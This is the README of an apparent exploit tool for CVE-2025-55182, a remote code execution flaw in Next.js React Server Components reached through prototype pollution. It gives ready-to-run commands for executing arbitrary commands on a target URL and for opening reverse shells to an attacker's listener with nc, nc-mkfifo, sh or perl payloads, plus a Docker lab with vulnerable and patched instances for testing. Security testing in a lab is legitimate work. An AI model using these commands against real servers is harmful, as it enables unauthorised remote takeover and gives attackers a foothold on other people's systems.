Next.js React Server Components RCE Exploit

Exploits CVE-2025-55182 for remote code execution via prototype pollution.

Installation

uv sync

Usage

Command Execution

source .venv/bin/activate
python3 exploit.py -u https://example.com -c "id"

Reverse Shell

python3 exploit.py -u https://example.com -r -l YOUR_IP -p 4444 -P nc-mkfifo

Options

• -u, --url: URL/host to check (required)
• -c, --cmd: Command to execute
• -r, --reverse: Enable reverse shell mode
• -l, --lhost: Listener host for reverse shell
• -p, --lport: Listener port for reverse shell
• -P, --payload: Reverse shell payload type: nc, nc-mkfifo, sh, perl (default: nc)
• --timeout: Request timeout in seconds (default: 10)

Examples

# Execute command
python3 exploit.py -u https://example.com -c "whoami"

# Reverse shell with nc-mkfifo (recommended for Alpine)
python3 exploit.py -u https://example.com -r -l 172.29.0.1 -p 4444 -P nc-mkfifo

Lab Environment

The lab/ directory contains a complete Docker setup for testing the exploit.

Setup

cd lab
docker-compose up -d

This will start two services:

• vulnerable: Vulnerable Next.js application on port 3011
• patched: Patched Next.js application on port 3012

Testing

# Test on vulnerable instance
python3 exploit.py -u http://localhost:3011 -c "id"

# Test reverse shell (get gateway IP first)
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')
python3 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo